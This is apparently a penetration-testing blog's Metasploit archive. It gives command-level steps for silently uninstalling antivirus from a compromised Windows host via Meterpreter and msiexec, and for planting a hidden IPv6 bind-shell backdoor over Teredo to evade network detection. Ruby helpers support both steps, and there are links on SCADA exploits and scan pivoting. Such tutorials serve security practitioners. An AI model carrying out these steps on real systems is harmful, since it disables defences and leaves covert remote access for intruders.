Category Archives: Metasploit

Fixing Stale Cache on Metasploit for Mac OSX

Filed under Fu (a.k.a Tips), Metasploit

So I just finished installing Metasploit on my Mac (official tutorial here).

After the typical 'svn update', msfconsole only showed a partial set of exploits (263, to be exact). Knowing that Metasploit currently ships 600+, I knew something was wrong.

Thanks to HD Moore, I was able to fix it with this simple command, which deletes the stale module cache so that msfconsole rebuilds it on the next start:

rm -f ~/.msf3/modcache

Remotely Removing Anti-Virus

Filed under Fu (a.k.a Tips), Metasploit

These are the command outlines given by Rob Fuller (mubix) on his blog, room362.

Although there are many ways to disable anti-virus on a remote machine (including the Metasploit killav script), actually removing the AV is just as simple, provided it was installed through Windows Installer (MSI), because the uninstall is done by msiexec with the product GUID. Here are the steps (click the link above for the full video):

  1. Get a Meterpreter shell.
  2. Edit the Metasploit get_application_list script:
     - add "GUID" to the 'Columns' array of the output table, so the uninstall registry key is printed alongside name and version;
     - modify the line inside the new thread creation that adds a row to the table to read: tbl << [dispnm, dispversion, k]
       (k is the application's key under ...\CurrentVersion\Uninstall; for an MSI-installed product its last component is the product GUID).
  3. Run the get_application_list script.
  4. Find the GUID of the AV in the new column (it should be a braced GUID, like {XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}).
  5. Drop into a cmd shell and run: msiexec /norestart /q /x {GUID} REMOVE=all
  6. Give it some time, and voila!
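The step that trips people up is step 4: only products installed by Windows Installer have a GUID as their Uninstall subkey, and msiexec /x only works for those; anything else has to be removed through the key's UninstallString value instead. The following is an added example (not mubix's script and not Metasploit code) that takes rows in the shape the modified get_application_list prints, [key, DisplayName, DisplayVersion], and returns the product GUID and the msiexec line for any application whose name matches a pattern. The registry paths, product names and GUIDs are constructed sample data; the UNINSTALL, SAMPLE_APPS, product_code, msiexec_uninstall and find_uninstall names are my own.

```ruby
# Added example (not mubix's script or Metasploit code): pick the product GUID
# of a named application out of get_application_list-style rows and build the
# msiexec uninstall line. All names, paths and GUIDs below are constructed.
GUID_RE = /\A\{[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\}\z/i

UNINSTALL = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'

# [registry key (the added "k" column), DisplayName, DisplayVersion]
SAMPLE_APPS = [
  ["#{UNINSTALL}\\{A1B2C3D4-E5F6-4A7B-8C9D-0E1F2A3B4C5D}", 'Example Antivirus', '10.0.1'],
  ["#{UNINSTALL}\\Example Browser", 'Example Browser (3.6)', '3.6'],
  ["#{UNINSTALL}\\{11111111-2222-3333-4444-555555555555}", 'Example Runtime', '9.0'],
]

# The last component of the Uninstall subkey is the Windows Installer product
# code only for MSI-installed products; for anything else this returns nil.
def product_code(key)
  leaf = key.split('\\').last
  leaf if leaf =~ GUID_RE
end

# The exact command from the post: quiet, no reboot, full removal.
def msiexec_uninstall(guid)
  "msiexec /norestart /q /x #{guid} REMOVE=all"
end

# One hash per application whose DisplayName matches +pattern+. :command is
# nil when the product is not MSI-installed; in that case the key's
# UninstallString value (not listed by the script) is what you need.
def find_uninstall(apps, pattern)
  apps.select { |_key, name, _ver| name =~ pattern }.map do |key, name, version|
    guid = product_code(key)
    { name: name, version: version, key: key, guid: guid,
      command: guid ? msiexec_uninstall(guid) : nil }
  end
end

if __FILE__ == $PROGRAM_NAME
  find_uninstall(SAMPLE_APPS, /antivirus/i).each do |hit|
    puts "#{hit[:name]} #{hit[:version]}"
    puts "  #{hit[:command] || 'not an MSI product; check UninstallString'}"
  end
end
```

Run it against the real output of the modified script (paste the rows into SAMPLE_APPS, or feed them in from a file) and it prints the msiexec line ready for step 5, or tells you that the product is not MSI-installed and the trick does not apply.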

Persistence In IPv6 (Notes)

Filed under Basics, Fu (a.k.a Tips), Metasploit

Here are some command notes I made from the Hak5 episode with Mubix, where he demonstrated remote-access persistence via IPv6. The technique has also been shown to bypass NIDS/NIPS that are not configured to inspect IPv6, or that do not decapsulate Teredo (IPv6 tunnelled inside UDP/IPv4) at all.

You can view the episode here!

Install IPv6 (only needed on Windows XP/2003; Vista and later ship with it installed):

netsh int ipv6 install

Enable Teredo (the enterpriseclient type skips managed-network detection, so Teredo stays up on a domain-joined host, where the default client type would switch itself off):

netsh int ipv6 set teredo enterpriseclient

Verify Teredo and IPv6 are working correctly (the State line should read "qualified"; anything else means the Teredo server could not be reached through the NAT and the bind address will not be reachable from outside):

netsh int ipv6 show teredo

Copy down the target's IPv6 address (the Teredo one, starting 2001:0:, listed under the Teredo Tunneling Pseudo-Interface, not the fe80:: link-local address):

ipconfig /all

Create the bind shell payload (msfpayload syntax of the time; msfpayload has since been replaced by msfvenom):

./msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=[port] X > bindshell.exe

Upload and execute the payload via Meterpreter (-H hides the window, -c channelizes the process I/O):

upload bindshell.exe
execute -H -c -f bindshell.exe

To reconnect from msfconsole (inside exploit/multi/handler; your own box needs IPv6 reachability to the target's Teredo address, via Teredo or native IPv6):

set PAYLOAD windows/meterpreter/bind_ipv6_tcp
set RHOST [ipv6 address you got earlier]
set LPORT [port it's bound to]
exploit
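A Teredo address is not opaque: per RFC 4380, every address in 2001:0::/32 carries the Teredo server's IPv4, a flags word, and the client's external UDP port and IPv4 address (the last two XORed with all ones). Decoding the address you copied in the ipconfig step tells you which NAT mapping the bind shell sits behind, and a defender can apply the same decoding to Teredo addresses seen in logs. The following is an added example (not from the Hak5 episode and not Metasploit code) that pulls Teredo addresses out of ipconfig-style text and decodes them. The SAMPLE_IPCONFIG text is constructed and uses the RFC 4380 worked-example address rather than a real host; the function names teredo?, parse_teredo and find_teredo_addresses are my own.

```ruby
require 'ipaddr'

# Added example (not from the Hak5 episode or Metasploit): identify the Teredo
# address to bind to and decode what it reveals about the host's NAT.
TEREDO_PREFIX = IPAddr.new('2001:0::/32')

def teredo?(addr)
  ip = IPAddr.new(addr)
  ip.ipv6? && TEREDO_PREFIX.include?(ip)
rescue IPAddr::InvalidAddressError
  false
end

# RFC 4380 layout: prefix(4) | server IPv4(4) | flags(2) | ~port(2) | ~client IPv4(4)
def parse_teredo(addr)
  raise ArgumentError, "not a Teredo address: #{addr}" unless teredo?(addr)
  b = IPAddr.new(addr).hton.bytes                    # 16 bytes, network order
  {
    server: b[4, 4].join('.'),                       # Teredo server IPv4
    cone:   (((b[8] << 8) | b[9]) & 0x8000) != 0,    # cone-NAT flag
    port:   ((b[10] << 8) | b[11]) ^ 0xffff,         # external UDP port
    client: b[12, 4].map { |x| x ^ 0xff }.join('.')  # external (NAT) IPv4
  }
end

# Pull Teredo addresses out of text such as 'ipconfig /all' output; link-local
# and other non-Teredo literals are left out.
def find_teredo_addresses(text)
  text.scan(/2001:0{1,4}:[0-9a-f:]+/i).select { |a| teredo?(a) }
end

# Constructed sample of the relevant 'ipconfig /all' lines (the Teredo address
# is the RFC 4380 worked example, not a real host).
SAMPLE_IPCONFIG = <<~TXT
  Tunnel adapter Teredo Tunneling Pseudo-Interface:
     IPv6 Address. . . . . . . . . . . : 2001:0:4136:e378:8000:63bf:3fff:fdd2(Preferred)
     Link-local IPv6 Address . . . . . : fe80::8000:63bf:3fff:fdd2%11(Preferred)
     Default Gateway . . . . . . . . . : ::
TXT

if __FILE__ == $PROGRAM_NAME
  find_teredo_addresses(SAMPLE_IPCONFIG).each do |a|
    info = parse_teredo(a)
    puts "#{a}: server #{info[:server]}, client #{info[:client]}:#{info[:port]}, cone=#{info[:cone]}"
  end
end
```

The decoded client address and port are the NAT's external mapping for the Teredo client; if the external IPv4 is not one you expect to see for that site, or the State line is not "qualified", the bind shell will not be reachable and the address is not worth writing down.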

Metasploit gets SCADA

Filed under Fu (a.k.a Tips), Metasploit, News

I'm a little behind the curve on this one, but I'm sure not everyone has heard the news yet. Yesterday the media lit up about the latest addition to the Metasploit Framework: SCADA exploits.

SCADA?

SCADA stands for Supervisory Control and Data Acquisition. It is the class of system used to manage our infrastructure operations. So when you think about "leet haxors" taking over the power grid or water works, this is what they would be attacking. Currently there are ~16 exploits for SCADA, but with the release of exploits in Metasploit, we will see a major increase in the discovery and use of SCADA attacks.

Read more here:

Everybody Panic…

…Dawn of a New Era

Nessus Scanning Via Meterpreter

Filed under Fu (a.k.a Tips), Metasploit, Research

This is beautiful! I have wondered for a long time how to perform scans of a remote network via a compromised machine using Meterpreter. DigiNinja (with some help from Mark Baggett and Egypt) has finally shown us how. (By the way, this is a great reason for everyone to join some good mailing lists: this was the result of a discussion on the Metasploit list.)

Why is this a big deal? The ease of use and simplicity of Metasploit/Meterpreter is a big enough reason in itself. However, the fact that the entire scan pivots through a machine without touching anything but its memory is another huge benefit.

Although the tutorial is meant for Nessus, I'd imagine the same technique would work for Nmap and other scanners run through Metasploit.

Take a look at it and enjoy!

Nessus Through Socks Through Meterpreter

EDIT:

Here is a link to Mark Baggett’s original blog post (on PaulDotCom) about using Proxychains and SSH to do the same thing:

SSH gymnastics with Proxychains
